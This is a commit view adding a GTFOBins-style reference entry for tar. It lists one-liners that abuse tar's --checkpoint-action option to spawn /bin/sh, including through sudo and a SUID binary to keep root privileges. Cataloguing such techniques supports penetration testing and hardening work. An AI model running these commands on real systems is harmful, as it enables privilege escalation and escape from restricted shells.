First commit
This commit is contained in:
10
_gtfobins/tar.md
Normal file
10
_gtfobins/tar.md
Normal file
@@ -0,0 +1,10 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
|
||||
-p"
|
||||
---
|
||||
Reference in New Issue
Block a user